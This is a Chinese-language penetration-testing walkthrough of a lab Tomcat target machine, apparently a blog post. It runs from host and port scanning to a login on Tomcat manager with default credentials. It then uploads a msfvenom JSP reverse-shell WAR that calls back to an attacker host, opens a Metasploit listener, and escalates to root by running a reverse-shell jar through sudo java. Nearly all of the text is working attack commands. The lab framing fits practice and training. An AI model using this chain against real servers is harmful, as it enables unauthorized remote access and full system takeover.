一、信息收集
1.主机发现
arp-scan -l #ARP扫描工具进行主机发现
2.端口扫描
nmap -A -sV -p- --min-parallelism 100 192.168.108.132 #扫描端口
nmap用法:
-A 可以扫描出服务版本信息和目标操作系统信息,不同服务的版本有着相应的漏洞可以利用 -p- 是对靶机所有1-65535的端口进行发现扫描 -sV 扫描目标主机的端口上运行的软件版本,顺带扫带端口 --min-parallelism 100 调整探测报文的并行度
二、漏洞探测
1.目录扫描
dirb http://192.168.108.132:8080 #对目标靶机的8080端口进行目录扫描
2.访问端口
8080端口是tomcat的默认端口,可以尝试访问该页面
tomcat的默认用户名密码是tomcat和tomcat,尝试登录
成功登录到管理员界面192.168.187.129:8080/manager,点击应用程序列表

往下翻,可以发现可以上传war文件

三、getshell
1.上传木马
首先使用msfvenom生成war木马
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.108.129 lport=4444 -f war >shell.war
msfvenom是msf用来生成木马的一个工具,它可以用来根据不同的操作环境生成相应的木马。
这里的java/jsp_shell_reverse_tcp就是jsp的环境
LHOST的攻击主机的ip
LPORT是攻击主机的端口
-f war就是将木马输出为.war文件

然后上传war文件木马

发现上传成功
2.kali开启监听
先在kali里设置监听
use exploit/multi/handler #使用攻击模块
show options #查看模块信息
set lhost 192.168.108.129 #设置监听ip(kali的ip)
set lport 4444 #设置监听端口(上面生成war木马是设置的端口)
exploit #启动
3.访问木马,反弹shell
http://192.168.108.132:8080/shell/

成功反弹
最后查看靶机信息,执行sudo -l可以看到靶机sudo权限可以执行的命令
可以看到sudo权限可以执行java
python -c 'import pty;pty.spawn("/bin/bash")' #切换python环境
ls #查看目录
id #查看登录id
sudo -l #查看可执行权限

四、提权
1.生成jar木马提权文件(kali里)
msfvenom —platform java -f jar -p java/shell_reverse_tcp LHOST=192.168.108.129 LPORT=5555 -o shell.jar #生成jar木马提权文件

2.上传jar木马文件(靶机里)
scp zhang@192.168.108.129:/home/zhang/shell.jar /tmp #从远程服务器拷贝文件到本地,将远程服务器192.168.108.129用户目录下的shell.jar文件拷贝到本地/tmp文件夹下
3.开启监听(kali里)
nc -lvp 5555 #采用nc实现端口监听,端口是设置jar木马文件时的端口

4.访问执行木马文件(靶机监听里)
sudo -u root java -jar shell.jar #执行木马文件
5.监听提权成功(kali里)
id #发现已经是root权限

本文详细介绍了如何进行靶机渗透,从信息收集(主机发现、端口扫描)到漏洞探测(目录扫描、访问8080端口),再到通过上传war木马并反弹shell。接着,通过生成jar木马文件进行提权,最终在kali系统中监听并成功提权。整个过程展示了针对MY_TOMCAT_HOST的渗透测试步骤。




673

被折叠的 条评论
为什么被折叠?



